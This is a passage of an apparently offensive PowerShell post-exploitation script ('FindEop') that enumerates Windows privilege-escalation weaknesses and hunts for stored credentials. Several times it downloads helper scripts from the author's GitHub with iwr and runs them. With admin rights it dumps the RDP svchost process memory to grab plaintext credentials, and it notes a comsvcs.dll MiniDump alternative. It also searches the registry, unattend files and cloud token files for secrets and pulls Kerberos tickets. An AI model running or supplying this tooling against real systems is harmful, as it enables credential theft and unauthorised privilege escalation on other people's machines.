\"`n\"\r\n\r\n\r\n#List Local Groups\r\nWrite-Host \"LIST LOCAL GROUPS\"\r\nWrite-Host \"-----------------\"\r\nGet-LocalGroup|Select-Object Name,SID,PrincipalSource|Format-table -AutoSize|Out-String -Stream|Select-Object -Skip 1|ForEach-Object {\r\n $stringformat = If($_ -iMatch '^(Administra)')\r\n {\r\n @{ 'ForegroundColor' = 'Yellow' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n}\r\n\r\n\r\n#List HotFixes\r\nWrite-Host \"LIST HOTFIXES INSTALLED\"\r\nWrite-Host \"-----------------------\"\r\nGet-HotFix|Select-Object Description,HotFixID,InstalledBy,InstalledOn|Format-table -AutoSize|Out-String -Stream|Select-Object -Skip 1|Select-Object -SkipLast 1|ForEach-Object {\r\n $stringformat = If($_ -iMatch '^(Security Update)')\r\n {\r\n @{ 'ForegroundColor' = 'Yellow' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n}\r\nWrite-Host \"\"\r\n\r\n\r\n#List Privileges\r\nWrite-Host \"PRIVILEGES INFORMATION\"\r\nWrite-Host \"----------------------\"\r\nwhoami /priv|Format-Table|Out-String -Stream|Select-Object -Skip 4|ForEach-Object {\r\n $stringformat = If($_ -iMatch '(Enabled)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Abusing the golden privileges\r\nWrite-Host \"JUICY POTATO GOLDEN PRIVILEGES\"\r\nWrite-Host \"[i] vulnerable priv if shell is running with low privileges\" -ForeGroundColor Yellow\r\nWrite-Host \"-----------------------------------------------------------\"\r\nIf($Verb -ieq \"False\")\r\n{\r\n $juicy = whoami /priv|findstr /i /C:'SeImpersonatePrivileges' /i /C:'SeAssignPrimaryTokenPrivilege'|findstr /i /C:'Enabled';\r\n If(-not($juicy))\r\n {\r\n write-host \"[GOLDEN] None vulnerable token privileges found.\"\r\n }\r\n Else\r\n {\r\n Write-Host $juicy -ForeGroundColor Green\r\n }\r\n}\r\nElse\r\n{\r\n #NOTE: FindEop.ps1 -verb 'true' - triggers more elaborated checks (slower)\r\n New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT|Out-Null;\r\n $CLSID = (Get-ItemProperty HKCR:\\clsid\\* | Select-Object * | Where-Object {\r\n $_.appid -ne $null}).PSChildName|Select -Last 2;ForEach($a in $CLSID)\r\n {\r\n Write-Host \"[CLSID:] $a\" -ForegroundColor DarkGray\r\n }\r\n $juicy = whoami /priv|findstr /i /C:'SeImpersonatePrivileges' /i /C:'SeAssignPrimaryTokenPrivilege'|findstr /i /C:'Enabled';\r\n If(-not($juicy))\r\n {\r\n write-host \"[GOLDEN] None vulnerable token privileges found.\" -ForeGroundColor Red\r\n }\r\n Else\r\n {\r\n Write-Host $juicy -ForeGroundColor Green\r\n }\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\n#Rotten Potato Silver Privileges\r\nwrite-host \"ROTTEN POTATO SILVER PRIVILEGES\"\r\nWrite-Host \"[i] vulnerable priv if shell is running with low privileges\" -ForeGroundColor Yellow\r\nwrite-host \"-----------------------------------------------------------\"\r\n$RottenPotato = whoami /priv|findstr /C:'SeImpersonatePrivilege' /C:'SeAssignPrimaryPrivilege' /C:'SeTcbPrivilege' /C:'SeBackupPrivilege' /C:'SeRestorePrivilege' /C:'SeCreateTokenPrivilege' /C:'SeLoadDriverPrivilege' /C:'SeTakeOwnershipPrivilege' /C:'SeDebugPrivileges'|findstr /C:'Enabled';\r\nIf(-not($RottenPotato))\r\n{\r\n write-host \"[SILVER] None vulnerable token privileges found.\"\r\n}\r\nElse\r\n{\r\n Write-Host $RottenPotato -ForeGroundColor Green\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\n#Check For Named Pipes\r\nwrite-host \"CHECK FOR NAMED PIPES\"\r\n#[System.IO.Directory]::GetFiles(\"\\\\.\\pipe\\\")\r\n#Check for Named Pipes. This can be exploited to obtain the privileges of a process connecting to them.\r\nIf($Verb -ieq \"False\")\r\n{\r\n Write-Host \"[i] First 5 pipes found.\" -ForeGroundColor Yellow\r\n Write-Host \"------------------------\"\r\n $CheckPipes = (Get-ChildItem \\\\.\\pipe\\ -EA SilentlyContinue).FullName;\r\n If($CheckPipes)\r\n {\r\n Write-Host \"[VULNERABLE::T1574]\" -ForeGroundColor Green -BackGroundColor Black;\r\n $Report = $CheckPipes|Select -Skip 1|Select -First 5;echo $Report\r\n }\r\n Else\r\n {\r\n Write-Host \"ERROR: None Name Pipes found ..\"\r\n }\r\n}\r\nElse\r\n{\r\n Write-Host \"[i] First 10 pipes found.\" -ForeGroundColor Yellow\r\n Write-Host \"-------------------------\"\r\n $CheckPipes = (Get-ChildItem \\\\.\\pipe\\ -EA SilentlyContinue).FullName;\r\n If($CheckPipes)\r\n {\r\n Write-Host \"[VULNERABLE::T1574]\" -ForeGroundColor Green -BackGroundColor Black;\r\n $Report = $CheckPipes|Select -Skip 1|Select -First 10;echo $Report\r\n }\r\n Else\r\n {\r\n Write-Host \"ERROR: None Name Pipes found ..\"\r\n }\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\n#Environement Paths\r\nWrite-Host \"ENVIRONEMENT PATHS\"\r\nWrite-Host \"------------------\"\r\n($Env:Path) -Split ';'\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Environement paths entries permissions\r\nWrite-Host \"SCANNING ENVIRONEMENT PATHS PERMISSIONS\"\r\nWrite-Host \"[i] Place exe or DLL to exec instead of legitimate\" -ForeGroundColor Yellow\r\nWrite-Host \"--------------------------------------------------\"\r\niwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/ACLMitreT1574.ps1\" -OutFile \"$Env:TMP\\ACLMitreT1574.ps1\"|Unblock-File\r\nIf($Verb -ieq \"False\")\r\n{\r\n powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action path -Egg true\r\n}\r\nElse\r\n{\r\n #NOTE: FindEop.ps1-verb 'true' - triggers more elaborated checks (slower)\r\n powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action path -extraGroup true -extraperm true -Egg true\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#User Directorys with fullCONTROL or modify permisions\r\nIf($verb -ieq \"False\")\r\n{\r\n Write-Host \"DIRECTORYS WITH 'FULLCONTROLL, MODIFY' PERMISSIONS\"\r\n Write-Host \"[i] Scanning All %PROGRAMFILES% directorys recursive ....\" -ForeGroundColor Yellow\r\n Write-Host \"---------------------------------------------------------\"\r\n powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action dir -Egg true\r\n}\r\nElse\r\n{\r\n Write-Host \"DIRECTORYS WITH 'FULLCONTROLL, MODIFY, WRITE' PERMISSIONS\"\r\n Write-Host \"[i] Scanning All %PROGRAMFILES% directorys recursive ....\" -ForeGroundColor Yellow\r\n Write-Host \"---------------------------------------------------------\"\r\n powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action dir -extraGroup true -extraperm true -Egg true\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#List Unquoted Service Paths\r\nWrite-Host \"SEARCHING FOR UNQUOTED SERVICE PATHS\"\r\nWrite-Host \"------------------------------------\"\r\niwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/Sherlock.ps1\" -OutFile \"$Env:TMP\\Sherlock.ps1\"|Unblock-File\r\nImport-Module -Name \"$Env:TMP\\Sherlock.ps1\" -Force;Get-Unquoted SE|Out-String -Stream|Select-Object -Skip 1\r\nWrite-Host \"* ElapsedTime:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"00:00:03\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\nWrite-Host \" - scantype:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"Unquoted\" -ForegroundColor Green -BackgroundColor Black;\r\nWrite-Host \"`n\"\r\n\r\n\r\nWrite-Host \"WEAK SERVICES REGISTRY PERMISSIONS\"\r\nWrite-Host \"----------------------------------\"\r\n#(Get-Acl -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\services\\*\" -EA SilentlyContinue).PSPath\r\nIf($verb -ieq \"False\")\r\n{\r\n powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action reg -Egg true\r\n}\r\nElse\r\n{\r\n powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action reg -extraGroup true -Egg true\r\n}\r\nRemove-Item -path \"$Env:TMP\\ACLMitreT1574.ps1\" -Force\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Define Batch title again because sherlock.ps1 + ACLMitreT1574.ps1 changed it ..\r\n$host.UI.RawUI.WindowTitle = \"@FindEop $BatVersion {SSA RedTeam @2022}\"\r\n\r\n\r\n#List Programs that run at startup\r\nWrite-Host \"SEARCHING PROGRAMS THAT RUN AT STARTUP\"\r\nWrite-Host \"--------------------------------------\"\r\nGet-CimInstance Win32_StartupCommand|Select-Object Name,Command,Location,User|Format-List|Out-String -Stream|Select-Object -Skip 2|Select-Object -SkipLast 2|ForEach-Object {\r\n $stringformat = If($_ -Match '^(Command :)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n ElseIf($_ -iMatch '^(Location :)')\r\n {\r\n @{ 'ForegroundColor' = 'Yellow' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n}\r\nWrite-Host \"\"\r\n\r\n\r\n#List tasks running under system privs\r\nWrite-Host \"TASKS RUNNING UNDER 'SYSTEM' PRIVILEGES\"\r\nWrite-Host \"---------------------------------------\"\r\ntasklist /fi 'username eq system'|Format-Table|Out-String -Stream|Select-Object -Skip 1\r\nWrite-Host \"`n\"\r\n\r\n\r\n## REGISTRY SEARCH ##\r\n\r\n\r\n#Get Domain Controllers\r\nWrite-Host \"GET DOMAIN CONTROLLERS\"\r\nWrite-Host \"----------------------\"\r\n$DomainControler = $Env:USERDOMAIN;\r\nWrite-Host DCName::[$DomainControler] 0x995 -ForeGroundColor Yellow;\r\n$um = nltest /DCNAME:$DomainControler;\r\n$do = nltest /DSGETDC:$DomainControler;\r\n$li = nltest /DCLIST:$DomainControler;\r\nIf($um -ieq $null -or $do -ieq $null -or $li -ieq $null)\r\n{\r\n Write-Host \"[MITRE::T1069] fail to found a valid DC name.\" -ForeGroundColor Red -BackGroundColor Black\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Powershell engine settings\r\nWrite-Host \"DETECTING POWERSHELL ENGINE\"\r\nWrite-Host \"---------------------------\"\r\n$PSDefaultVersion = (Get-Host).Version.ToString();\r\nwrite-host \"PowershellDefault : $PSDefaultVersion\" -ForeGroundColor Yellow\r\n$TESTREGISTRY = reg query \"HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine\" /v PowerShellVersion | findstr /C:'2.0';\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \"PowerShellVersion : 2.0 => [VULNERABLE::T1562]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"ERROR: The system was unable to find the specified registry key or value.\"\r\n}\r\n(reg query \"HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine\" /v PowerShellVersion | findstr /C:'5.') -replace ' PowerShellVersion REG_SZ ','PowerShellVersion :'\r\n(reg query \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\" /v EnableModuleLogging | findstr /C:'0x1') -replace ' EnableModuleLogging REG_DWORD 0x1','EnableModuleLogging : True'\r\n(reg query \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging | findstr /C:'0x1') -replace ' EnableScriptBlockLogging REG_DWORD 0x1','EnableScriptBlockLogging : True'\r\nWrite-Host \"`n\"\r\nStart-Sleep -Milliseconds 800\r\n\r\n\r\n#Is RDP access Enabled?\r\nWrite-Host \"IS RDP ACCESS ENABLED?\"\r\nWrite-Host \"----------------------\"\r\ntry{\r\n $TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -Name fDenyTSConnections -EA SilentlyContinue;\r\n If($TESTREGISTRY -Match '0')\r\n {\r\n Write-Host \"[RDP] Connections: Allowed fDenyTSConnections REG_DWORD 0X$TESTREGISTRY\" -ForeGroundColor Green -BackGroundColor Black\r\n }\r\n Else\r\n {\r\n Write-Host \"[RDP] Connections: NotAllowed REG_DWORD 0x1.\"\r\n }\r\n}catch{\r\n Write-Host \"[RDP] Connections: NotAllowed REG_DWORD 0x1.\"\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Remote Desktop Credentials Manager\r\nWrite-Host \"REMOTE DESKTOP CREDENTIALS MANAGER\"\r\nWrite-Host \"----------------------------------\"\r\nIf(Test-Path -Path \"$Env:LOCALAPPDATA\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\" -ErrorAction SilentlyContinue)\r\n{\r\n Write-Host \"Exists : True\"\r\n Write-Host \"Name : RDCMan.settings\"\r\n Write-Host \"Directory : %LOCALAPPDATA%\\Microsoft\\Remote Desktop Connection Manager\" -ForeGroundColor Green\r\n Write-Host \"vulnerablity : Credentials are stored inside [ .rdg ] files ..\" -ForeGroundColor Yellow\r\n}\r\nElse\r\n{\r\n Write-Host \"[RDP] not found: %LOCALAPPDATA%\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\"\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\nWrite-Host \"DUMPING PLAINTEXT RDP CREDENTIALS FROM SVCHOST\" #WSearch\r\nWrite-Host \"[i] Credentials are stored in plaintext in memory\" -ForeGroundColor Yellow\r\nWrite-Host \"-------------------------------------------------\"\r\nIf((Get-Service -Name \"termservice\" -EA SilentlyContinue).Status -ieq \"Running\")\r\n{\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"RDP\" -ForeGroundColor Green -NoNewline;\r\n Write-Host \"] 'termservice' service running! [\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"OK\" -ForeGroundColor Green -NoNewline;\r\n Write-Host \"]\" -ForeGroundColor DarkGray;\r\n\r\n ## Query for svchost service Id (Responding) which has loaded rdpcorets.dll\r\n # $QueryTasts = tasklist /M:rdpcorets.dll|findstr \"svchost\"\r\n $PPID = (PS -EA SilentlyContinue | Where-Object {\r\n $_.ProcessName -iMatch 'svchost' -and $_.Responding -iMatch 'True' -and $_.Modules.ModuleName -iMatch \"rdpcorets.dll\"\r\n }).Id\r\n\r\n If($PPID)\r\n {\r\n $IPATH = (Get-Location).Path.ToString()\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"RDP\" -ForeGroundColor Green -NoNewline;\r\n Write-Host \"] 'rdpcorets.dll' loaded by svchost! [\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"VULNERABLE::T1021\" -ForeGroundColor Green -NoNewline;\r\n Write-Host \"]\" -ForeGroundColor DarkGray;\r\n Start-Sleep -Milliseconds 1400\r\n\r\n #Get-ProcessMiniDump requires Administrator privileges to run!\r\n $bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\")\r\n If($bool)\r\n {\r\n #Download Get-ProcessMiniDump cmdlet from my GitHub repo\r\n iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Get-ProcessMiniDump.ps1\" -OutFile \"$Env:TMP\\Get-ProcessMiniDump.ps1\"|Unblock-File\r\n\r\n cd $Env:TMP\r\n Import-Module -Name .\\Get-ProcessMiniDump.ps1 -Force\r\n Get-ProcessMiniDump -ProcID $PPID -Path \"$Env:TMP\\rdpcoretsDLL.out\"\r\n ## Use comsvc.dll to dump svchost process (alternative to above cmdline)\r\n # .\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump [PROCESS ID] [FILE PATH] full\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"RDP\" -ForeGroundColor Green -NoNewline;\r\n Write-Host \"] 'svchost' dumped to '\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"$Env:TMP\\rdpcoretsDLL.out\" -ForeGroundColor Green -NoNewline;\r\n Write-Host \"'\" -ForeGroundColor DarkGray;\r\n Remove-Item -Path \"$Env:TMP\\Get-ProcessMiniDump.ps1\" -EA SilentlyContinue -Force\r\n cd $IPATH \r\n }\r\n Else\r\n {\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"RDP\" -ForeGroundColor Red -NoNewline;\r\n Write-Host \"] 'Get-ProcessMiniDump' requires administrator privileges! [\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"FAIL\" -ForeGroundColor Red -NoNewline;\r\n Write-Host \"]\" -ForeGroundColor DarkGray;\r\n }\r\n }\r\n Else\r\n {\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"RDP\" -ForeGroundColor Red -NoNewline;\r\n Write-Host \"] 'rdpcorets.dll' not loaded by svchost service! [\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"FAIL\" -ForeGroundColor Red -NoNewline;\r\n Write-Host \"]\" -ForeGroundColor DarkGray;\r\n }\r\n}\r\nElse\r\n{\r\n Write-Host \"[RDP] 'termservice' service stopped!\" -ForeGroundColor Red -BackGroundColor Black\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\nIf($verb -ieq \"True\")\r\n{\r\n #Cloud db Credentials in C:\\Users\r\n Write-Host \"CLOUD CREDENTIALS in $Env:USERPROFILE\"\r\n Write-Host \"-----------------------------------\"\r\n $TESTFILES = (Get-ChildItem -Path \"$Env:USERPROFILE\" -Recurse -Include 'credentials.db','access_tokens.db','accessTokens.json','azureProfile.json','legacy_credentials','gcloud' -Exclude 'Saved Games','Starcraft II','Music','Searches','Favorites','Videos','Battle.net','old_Cache_000','CacheStorage','GPUCache' -Force -EA SilentlyContinue).FullName;\r\n If($TESTFILES)\r\n {\r\n Write-Host \"[CLOUD] $TESTFILES\" -ForeGroundColor Green -BackGroundColor Black\r\n }\r\n Else\r\n {\r\n Write-Host \"[CLOUD] not found: credentials in db files.\" -ForeGroundColor Red -BackGroundColor Black\r\n }\r\n Write-Host \"`n\"\r\n}\r\n\r\n\r\n#List unattend.xml files\r\nWrite-Host \"LIST UNATTEND.XML FILES EXISTENCE\"\r\nWrite-Host \"[i] Creds are stored in base64 and can be decoded manually.\" -ForeGroundColor Yellow\r\nWrite-Host \"----------------------------------------------------------\"\r\nfindstr /S /I cpassword \\\\$FQDN\\sysvol\\$FQDN\\policies\\*.xml\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\unattend.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[XML] not found: $Env:WINDIR\\unattend.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\sysprep\\sysprep.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[XML] not found: $Env:WINDIR\\sysprep\\sysprep.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\sysprep\\sysprep.inf\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[XML] not found: $Env:WINDIR\\sysprep\\sysprep.inf\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\system32\\sysprep.inf\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[XML] not found: $Env:WINDIR\\system32\\sysprep.inf\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\Panther\\Unattend.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[XML] not found: $Env:WINDIR\\Panther\\unattend.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\system32\\sysprep\\sysprep.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[XML] not found: $Env:WINDIR\\system32\\sysprep\\sysprep.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\Panther\\Unattend\\Unattend.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[XML] not found: $Env:WINDIR\\Panther\\unattend\\unattend.xml\"\r\n}\r\nIf($Verb -ieq \"True\")\r\n{\r\n Write-Host \"[XML] Searching: for extra XML preference files.\" -ForeGroundColor Yellow\r\n $AllUsers = \"$Env:ALLUSERSPROFILE\";\r\n $XMLFiles = (Get-ChildItem -Path \"$AllUsers\" -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -EA SilentlyContinue).FullName;\r\n If(-not($XMLFiles))\r\n {\r\n Write-Host \"[XML] not found: $AllUsers extra XML files.\" -ForeGroundColor Red -BackGroundColor Black\r\n }\r\n Else\r\n {\r\n Write-Host \"[XML]:[VULNERABLE::T1552]\" -ForeGroundColor Green -BackGroundColor Black;\r\n Write-Host $FoundXmlFile\r\n }\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#List AlwaysInstallElevated\r\nWrite-Host \"REGISTRY ALWAYSINSTALLELEVATED\"\r\nWrite-Host \"------------------------------\"\r\n$TESTREGISTRY = Get-ItemPropertyValue -Path \"HKCU:\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\" -Name AlwaysInstallElevated -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \"[HKCU] AlwaysInstallElevated => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[HKCU] AlwaysInstallElevated: none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\" -Name AlwaysInstallElevated -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \"[HKLM] AlwaysInstallElevated => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \"[HKLM] AlwaysInstallElevated: none vulnerable settings found.\"\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Registry raw credentials search\r\nWrite-Host \"REGISTRY RAW CREDENTIALS SEARCH\"\r\nWrite-Host \"-------------------------------\"\r\n$StdOut = reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"|findstr 'LastUsedUsername DefaultUserName DefaultDomainName DefaultPassword';\r\nWrite-Host \"$StdOut\" -ForeGroundColor Green\r\n$TESTREGISTRY = Get-Item -Path \"HKLM:\\SYSTEM\\Current\\ControlSet\\Services\\SNMP\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \" [SNMP] found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \" [SNMP] : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\SimonTatham\\PuTTY\\Sessions\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \" [PuTTY] found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \" [PuTTY] : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\ORL\\WinVNC3\\Password\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \" [WinVNC3] found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \" [WinVNC3] : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SOFTWARE\\RealVNC\\WinVNC4\" -Name password -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \" [WinVNC4] $TESTREGISTRY => [VULNERABLE::T1012]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \" [WinVNC4] : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\OpenSSH\\Agent\\Keys\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \" [OpenSSH] found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \" [OpenSSH] : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\TightVNC\\Server\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n Write-Host \" [TightVNC] found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n Write-Host \" [TightVNC] : none vulnerable settings found.\"\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#LogonCredentialsPlainInMemory\r\nWrite-Host \"LOGON_CREDENTIALS_PLAIN_IN_MEMORY WDIGEST\"\r\nWrite-Host \"-----------------------------------------\"\r\ntry{\r\n $TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" -Name UseLogonCredential -EA SilentlyContinue;\r\n If($TESTREGISTRY -Match '1')\r\n {\r\n Write-Host \"[VULNERABLE::T1012] UseLogonCredential REG_DWORD 0X$TESTREGISTRY\" -ForeGroundColor Green -BackGroundColor Black\r\n }\r\n Else\r\n {\r\n Write-Host \"[WDIGEST] none vulnerable settings found.\"\r\n }\r\n}catch{\r\n Write-Host \"[WDIGEST] none vulnerable settings found.\"\r\n}\r\nWrite-Host \"`n\"\r\nStart-Sleep -Milliseconds 800\r\n\r\n\r\n\r\n#List Stored cmdkey creds\r\nWrite-Host \"STORED CMDKEY CREDENTIALS (runas)\"\r\nWrite-Host \"---------------------------------\"\r\ncmdkey /list|Format-Table|Out-String -Stream|Select-Object -Skip 3\r\nWrite-Host \"\"\r\n\r\n\r\n#Kerberos Tickets\r\nWrite-Host \"KERBEROS TICKETS\"\r\nWrite-Host \"----------------\"\r\nklist|Where-Object {$_ -ne ''}|Out-String -Stream|ForEach-Object {\r\n $stringformat = If($_ -iMatch '\\(0\\)')\r\n {\r\n @{ 'ForegroundColor' = 'Red' }\r\n }\r\n ElseIf($_ -iMatch '\\(\\d+\\)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n}\r\n$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\");\r\nIf(-not($bool))\r\n{\r\n Write-Host \"[i] Low privileges detected, running on demo mode ..\" -ForegroundColor red -BackGroundColor Black\r\n Write-Host \"\";Start-Sleep -Milliseconds 800\r\n}\r\niwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetKerbTix.ps1\" -OutFile \"$Env:TMP\\GetKerbTix.ps1\"|Unblock-File\r\nImport-Module -Name \"$Env:TMP\\GetKerbTix.ps1\" -Force|Out-String -Stream|ForEach-Object {\r\n $stringformat = If($_ -iMatch '^(klist failed)')\r\n {\r\n @{ 'ForegroundColor' = 'Red' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n}\r\nRemove-Item -Path \"$Env:TMP\\GetKerbTix.ps1\" -Force\r\nWrite-Host \"\"\r\n\r\n\r\n#DPAPI MASTER KEYS\r\nWrite-Host \"DPAPI MASTER KEYS\"\r\nWrite-Host 